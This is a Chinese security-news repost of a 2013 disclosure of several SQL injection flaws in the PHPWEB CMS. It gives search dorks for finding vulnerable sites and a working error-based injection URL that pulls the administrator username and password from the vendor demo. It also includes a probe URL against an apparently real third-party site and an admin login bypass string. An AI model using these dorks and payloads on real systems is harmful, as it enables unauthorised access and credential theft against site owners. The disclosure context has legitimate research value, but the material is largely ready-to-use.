热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

PHPWEB多处SQL注入漏洞打包

发布时间:2013-11-19 16:05文章来源:网络文章作者:秩名 点击次数:
摘要:漏洞作者: 只发通用型 提交时间: 2013-08-21 16:02 公开时间: 2013-11-19 16:02 漏洞类型: SQL注射漏洞 简要描述: 这套程序是付费的.网上找到的源码都是加密,没办法进行代码审计. 黑盒测试时顺便了解了一下这个CMS的历史 PHPWEB这个CMS的前身是MediSof...

漏洞作者: 只发通用型

提交时间: 2013-08-21 16:02
公开时间: 2013-11-19 16:02

漏洞类型: SQL注射漏洞
简要描述:

这套程序是付费的.网上找到的源码都是加密,没办法进行代码审计.
黑盒测试时顺便了解了一下这个CMS的历史
PHPWEB这个CMS的前身是MediSoft,后来改名为phpweb.
现在又有人拿这套系统去卖..
详细说明:

找这些网站的关键词

inurl:/class/?1.html

inurl:class/index.php?catid=0

inurl:/page/html/?1.html

一共三个注入点

1. ?数字.htm

第二和第三个要在magic_quotes_gpc=off 或者PHP5.3以上才能使用

2.

第一个注入,用官网的demo

http://demo.8555.net/3149_4369/product/html/?78'and(select/**/1/**/from(select/**/count(*),concat((select/**/(select/**/(select/**/concat(0x27,0x7e,user,0x27,0x7e,password,0x27,0x7e)/**/from/**/dev_base_admin/**/limit/**/0,1))/**/from/**/information_schema.tables/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)/*.html

 

 

PHPWEB多处SQL注入漏洞打包

 

 

第二、第三个注入,官网demo的magic_quotes_gpc开了.没用官方demo演示,随便百度个站

拼接方式太蛋疼,.木有写出POC。有兴趣的自己研究下

http://www.jlczzy.com/search/index.php?imageField.x=-1138&imageField.y=-319&key=1%27

 

 

PHPWEB多处SQL注入漏洞打包

 

第三个注入

/admin.php

账号密码admin' or '1'='1

 

PHPWEB多处SQL注入漏洞打包

 

标签分类:

上一篇:Siteserver 3.6.3版本存在SQL注入漏洞
下一篇:WordPress的橙色主题跨站请求伪造文件上传漏洞